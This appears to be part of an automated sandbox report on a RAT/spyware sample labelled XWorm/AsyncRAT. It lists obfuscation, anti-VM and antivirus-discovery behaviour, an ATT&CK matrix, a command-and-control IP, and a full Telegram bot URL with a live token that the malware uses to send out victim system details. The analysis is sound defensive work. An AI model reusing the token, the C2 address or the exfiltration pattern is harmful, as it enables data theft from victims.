'QeaFyp7eNMwyVwtHpKxgZRxvsNRfRibyJWARpIr7sDRV2kDKRCjnVVuiToPBdap401IV879hVobpmuqK', 'V41AXdXRfohEGR0ea2I1kBGrbFeFb7frm4Y3YZ1FB2QHwHi368a6UPrH3ZgAmiKBBqkh0cS3TNxAQoXi'
                  Source: Mzo6BdEtGv.exe, hMY5B4KaPYBa602NktZ1e4wVF.csHigh entropy of concatenated method names: 'WxO6haGbmISoUIXjKWGw5O0f6', '_1KdIk1gCCecm5eb5zn8kSjK12', 'PxlPQIsDfwQvPbKvl2sd3YzC2', 'PQy6sJgSzykRZLc0OQgp3FF40', 'EILjjH71J0z6TCdH4iiqNMin5', 'QyEqwp20c4swV4XJJGsgNpnyq', 'LcILsujkk2zDB1CPWPVFG2jJx', 'uJOKVr0lx53sKgbsneL3CqWRx', 'f9VWvJM0sfsTL6ygejd44nBUT', 'LlvOkQs0TO79zqf2p1q3KccCh'
                  Source: Mzo6BdEtGv.exe, jK41xlYzptzDvBwid77hpLBxe.csHigh entropy of concatenated method names: 'OKzUlm8N3VhAQNuXvYaHxIv0O', '_2jsV4Dr67P8WIcVYQJEwwfWilcqMU7dWO5FaXzBdwnR', 't33agRLkVoIksIMaeHSr25f5MenSU0vXFDLuVr5rAWm', 'BVIgd1nQM1laXCOCutMUo4uF0HHRkd5UhpQp2AsEeS6', 'Ra43n4P4GpAazsLfytyMIOCicKFs70KMZtEfMom59my'
                  Source: Mzo6BdEtGv.exe, bfkfUlXphuDWexMb7Hptw9A0Uiqaqiv3wcTDH2rsesSLHtj7cBMyE3HGKstJUv0HzfSu8adin33UdVLY.csHigh entropy of concatenated method names: 'HDzzscQJvBYBgYGtyyJw0Z62S91wb7ZXDt1NMuqGZTnSVN2vcQlDTHXeH2XAhC3gmojn3hCdfamp4xSP', 'DyRfj0jL7Ne2bEzdE2WfU2J4e', '_5cwjx4oJK76DGZBC7HDMSIo6L', 'EkkfnLKHA7eoPdl7FGnKbHjqz', 'XPrOaSGzOF9BMPB0rdF2ZuE16'
                  Source: Mzo6BdEtGv.exe, pSKX2ESKYwtRu7HoonhxcJzXgzsbsBZuYOVd9Vds3yt1hGYR8g17cCz98HD7kBGbZuAOSHn3AJPgLdPW.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'AlbU71MZss4P6Ud3ulC0jWSFtpHi3ZI21vljNexmkwF', 'vaWpfakNS07K6OJldx85Yn0LszjPpqeyLwg5G7rfYDr'
                  Source: Mzo6BdEtGv.exe, lY7fu9PmBNVoe7FoMUHT8miYA4vYaJzHYkvOgkLtM9q5YWq4XECDe3geFnamAon5jKsHVH7R7dVyQ7jT.csHigh entropy of concatenated method names: '_5okLwiJ41foiIntIR1bpQIYeVfb2NjbOtPiEyruBdM93JdUDOzPl2DNcdaVHYoqzlbhpqvLy0J9EUv5c', 'zRuxKtrhDWbunSLsf08MNFwph9WUoxAFk7Peo2bBSgilCpod6rdX1Dipbez5CkglY8zOH38ZMrRgwDGy', 'fZjSXjVI15O2JneQcWK85ilLwUINAP6B4FkyPJRSzFE61yuJPAJ19HsvusKKZTzfg7lUQuBArOldit1m', 'H9LK03UymbxxebVhWZLTVv3J88tyfIEKzzm9OStrPybmLFzdpu1V3lVipOh8awPV4gwN4DXIusrByqJs', 'staanouH9VVllYfUirHPC8zURapjFNgkbkbX2so6bIvb3wjagEhKC8k4nreHsHMrkbfHI1zpEdwNYZDe', 'pksVU8d9sjP2rIBvVbq1TZVmILG3XBWNflKO6HKmIgXkSbX6NZ5DgPC3M0cZ9EsA0GNH75zt5OAnngZT', 'GxfNTiSDCrb2TBkwI3tRzIuCv', 'iqbQLy0cKqXw68POWUFeBa0d0', 'aQEYPV88MgVpz2hMiTlWb6OeS', 'TcHYqV6bJRKM2fPlJrCwUZzmw'
                  Source: Mzo6BdEtGv.exe, eaJ1eKHKproU4hPKL7zZaCt5LB6GnC019powyiFeyxf1p497Wp7fUp93E51MTTI9BUzY4mbqnkBEPVkB.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'rjdrfrwAPPrH1gmYvWMyWqSDfwqLZrtzMOvlKFth4qIJyiOf0wirwL5Om8LDhRnfIXZdMIop9WZXlb93', 'xXTE3lS6QGxTBbQ6kgQwrnpXxPaNKn9C9N6INDuT2MlzvDfgO4DXX3oQtM', 'CoeaOGHXL0uzLmA25lE8RaXN5bTKg89qRqnXEiCDnBpP14hEsB1GcFe021', 'zlIqWsIOWHNCPt6mOc8ndEvujhC768c6GbdgaLArA3C', 'efdMufKoG8bO1IUbkgO4A2TnkTN9z1dusJF9Pcw3daY'
                  Source: Mzo6BdEtGv.exe, AJvfNnDNTuJbwuIBkqtWLE92s69ypiSn3oEaccD5GcHIniAl3b0xmXCXXRQlDua39ELK6FfoXcbxDFtY.csHigh entropy of concatenated method names: 'Zc0UAmirWNgMyU7RPbJclq0193JoKzdFjsT4ZUKLtBhG1SBtPc6mSKSfvhSv0MF6g3KbymOiN34vXBn2', 'xTtuDFtpunXLooIWmqJev5GyqjMpjlO5Pn7UNZnkHrIGoYIGVa7IoMZCEfCFnDuXsUC2rwixA1bjDEUw', 'qOAWJaM4h2YSCf2MDhBIMnRhdMBJLpG0SKzQTS3P80vgUs7g3cS7PK9ThtidaIT1R0d1c5geZf4JXViM', '_2GsH2tkogI2SHuEIgb66fa097', '_6NGmkasVpmvh070n767Zd89nMCnZKzTKwRTM5nXWcHH', 'HRTNPv742zdrFAMGwyGGxu87xflCuNVlRzsJRf3UiCU', 'V79dguIYFqPHIKmsX53d2RFCHn4VhwACswLW99D4JC7', 'IZMLsuKXM0BIC3Kj75qehAvrxsOQwkZ30Igw0JxA80b', '_8bWGcTHdIsr9qNXOZP7YFjCbS0Kns99IFIzGWB3tHiN', 'R3atKa2W4XuqIcUUDI38NAdMcGQGZVbBvDxDMlnf6KB'
                  Source: Mzo6BdEtGv.exe, jGx5RVtWYDbZ1ToL6PNlOwWojB7jLJ6X5CBAFyGmvjvmlmioDwDZ5YjCVlsreufEP7Xse0xBH6GOHG8W.csHigh entropy of concatenated method names: 'PtV3PgKoBJTBfHxOerUNidcwttFhlmwA8WDrWJTvwC2tOWY6l2hr9WVMOE316RohdBnAt9DUJhilYxz3', '_8BcFZG9nKm0Y5eKfyHrDW01Wvwc7CixNNvv1qM9DSM7Xw9wX7hUMTZk9L2NrMS48M02xNbGRVqjpgeq0', 'r2jWTD7FccKEuteed9WoBhB1Vn4JqKKksl3P579LWfpSQW3lTEyzyN91wfwmfHktqShUVwDDavsU1w5r', '_1exytb0IPi12lfcbJAUh2727dO4kKzebEdYC9Pfp0kLBrUrqJOh9CBvY5JR50upgpoe4v1NAZTP9fLwf', 'dZsr8qHlvW1VCFIgnTvIMwWbWMJnC1TmJfHt6k8S2m3inKm9yojdFlmddNEqv0ZiX9eQe4LHUZHN04FI', 'jpDYV1bSvTmVc8YKjIjO2igHlU5iQbA37qnhQlaqhX8i9PzhNLXiZAv3xwb49LcIFxEGJ1FdueFBS7P3', '_2OgwX7POlj3Lc7k0HVLc96Jm1H13YqCu3MmxPt8PTCnT7UO158KKKLsh39l3t9KhGVtNJN8WXk0fPI73', 'pZFSqEaHAjFQiDGNuydShEAx9dEA9Z4XEyA9cjqfApsDWcTUx4G11fj6Fnd4Qa5F3r9uiYWbxvzA5Uoi', 'wPprlMMgS8b7KRfzzaYNtXG224hdQjXdQA2bY9s37h5XyJI0wqfyVDN55SZpOCxoo94AweNHBnHgQ8Tu', '_3DEtVD6Qj8FBLGIMfr4L1gJLG5Wh10yDVfhAwiXkVFEtyC8yiF81mnqH85ItdVEe6Xios4sz19oD7SY6'
                  Source: Mzo6BdEtGv.exe, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csHigh entropy of concatenated method names: 'PNucxFnsZsmAH7ZtXAiLbYhTNwtoXdI3jSrG7l8JdFYI8y4ECae9QkpQxfCHI9CjoO37RtMbdN9QCRXA', 'jLiZEHlb8BeExAypewg0zeOoIRJBC4B4awLpTrKIInWmOfnIoqLljjFzAd1r2ByGWGH98bloN9ZRBPtd', 'tLRtcoizkEN95DWlJbuywj8qmTExZ2cF4QDYZKjqtBmUUedW8T9LcTtJFgNgl26hmcD6HXf3sdOMy3G7', 'pUQwgSO8RxKDRVwxnrsUWWj0QvQfWjrWlfB32szLybBrnHNL6P42mf3fEeFhXZQaTya4hKG6HBVYia6X', 'saI1iCbtHUFoBOe0YDbOsFuazEiP9peNaRt8lfw92OqJCrtCr0ntP3cXoqTKn0apPe2I7AbDQPdKNIRC', '_2LsIhZlfyiomhnjRA5BvAhexUvDfebqf3EIoHS0ytB9QGrcn0ugT72LAgdp9Grpxo0H4F7YyXQhOFPOy', '_5AWy2heCIieySYSYqguGUmV6MLXLVTLloftBenWstbEZdWXKjxN3X0bgVyF0wh25yHIvtuM1JbN9IsYP', 'WUvexTw2mL3On7KYwkAaLpgLg4QvlFX5Lg4Hs3pvpuyJAX12BxwE6WI7y2EbRbEwB6Ra5UdwXI7e0OgU', 'Ii9U3wE8YOPWYQykTTsUNk92la58iAVmecCGoooKy9uv8H2onRYJ7hpsTsnh61XZcHrteUk8Xbtobs67', 'kc0jgJebYNKe5XBYQAIof8kMjBCh79rlVPyB41WIALEb1JkDpf7SWQ7eAsYqDHx4WBu3vttZF2VEqDFC'
                  Source: Mzo6BdEtGv.exe, qmTkyAvhb2wNt6EFJkgKoQx8PUNM9p5XrEj4MhYLRljIFetnOWMNbr3hROe7cILDy1AzKJEMlJzfISXn.csHigh entropy of concatenated method names: 'T8N6JYRItBvITsl2B5FCZRlmiaVshMFO1A1pS8qCoXVzg8WrRMPQrOZ2MjWPZDNL96s4ZDXD0859xnzb', 'Hp4ifZNL0Zk6d3JpS3mb9ecb3cvLWnhrESlgjj4yKKVf2HuHhLzO70Ux8rvFtMehJKX6BsXWtMZA8md6', '_5I6uyywkP7w8NWl9CieCynsQVnYWuakDbIwAzhA75v0', 'CZK5mO0F213iwf5NMqGRXS9Fh8854sXfzLFunHGtctS', 'BsZyf5sKGTGC1Lb0aJbVV7wYV9Ce92dym7bdyixwf6K', 'Wo93OYkcN7j0LD2jtZuBD4VOYyPxDuYYemH99eds4Ph'
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeMemory allocated: 720000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeMemory allocated: 1A490000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWindow / User API: threadDelayed 8505Jump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWindow / User API: threadDelayed 1348Jump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exe TID: 7416Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeFile Volume queried: unknown FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeFile Volume queried: unknown FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeFile Volume queried: unknown FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeFile Volume queried: unknown FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeFile Volume queried: unknown FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeFile Volume queried: unknown FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: Mzo6BdEtGv.exe, 00000001.00000002.3746098718.000000001B2CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeQueries volume information: C:\Users\user\Desktop\Mzo6BdEtGv.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Mzo6BdEtGv.exe, 00000001.00000002.3746700198.000000001C235000.00000004.00000020.00020000.00000000.sdmp, Mzo6BdEtGv.exe, 00000001.00000002.3746098718.000000001B368000.00000004.00000020.00020000.00000000.sdmp, Mzo6BdEtGv.exe, 00000001.00000002.3746098718.000000001B2CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: Mzo6BdEtGv.exe, 00000001.00000002.3746098718.000000001B270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Mzo6BdEtGv.exe PID: 7760, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: Mzo6BdEtGv.exe, type: SAMPLE
                  Source: Yara matchFile source: 1.0.Mzo6BdEtGv.exe.e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000000.1284426259.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mzo6BdEtGv.exe PID: 7760, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Mzo6BdEtGv.exe PID: 7760, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: Mzo6BdEtGv.exe, type: SAMPLE
                  Source: Yara matchFile source: 1.0.Mzo6BdEtGv.exe.e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000000.1284426259.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mzo6BdEtGv.exe PID: 7760, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  OS Credential Dumping121
                  Security Software Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts131
                  Virtualization/Sandbox Evasion
                  LSASS Memory1
                  Process Discovery
                  Remote Desktop Protocol1
                  Clipboard Data
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  Deobfuscate/Decode Files or Information
                  Security Account Manager131
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                  Obfuscated Files or Information
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture1
                  Ingress Tool Transfer
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Software Packing
                  LSA Secrets13
                  System Information Discovery
                  SSHKeylogging2
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input Capture13
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Mzo6BdEtGv.exe82%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                  Mzo6BdEtGv.exe100%AviraTR/Spy.Gen
                  Mzo6BdEtGv.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  89.40.31.2320%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    89.40.31.232true
                    • Avira URL Cloud: safe
                    unknown
                    https://api.telegram.org/bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AFE6865D607A29FAFDCBE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20GCCE9LGK%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024false
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/botMzo6BdEtGv.exefalse
                        high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMzo6BdEtGv.exe, 00000001.00000002.3744158819.0000000002491000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          149.154.167.220
                          api.telegram.orgUnited Kingdom
                          62041TELEGRAMRUfalse
                          89.40.31.232
                          unknownRomania
                          35512TELEMEDIA-ASROtrue
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1562435
                          Start date and time:2024-11-25 15:35:45 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 58s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:7
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Sample name:Mzo6BdEtGv.exe
                          renamed because original name is a hash value
                          Original Sample Name:e9434c0bf7be5e39cfad4fe44bb996b09c1283de5706a8721a33363080e9d016.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@1/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 7
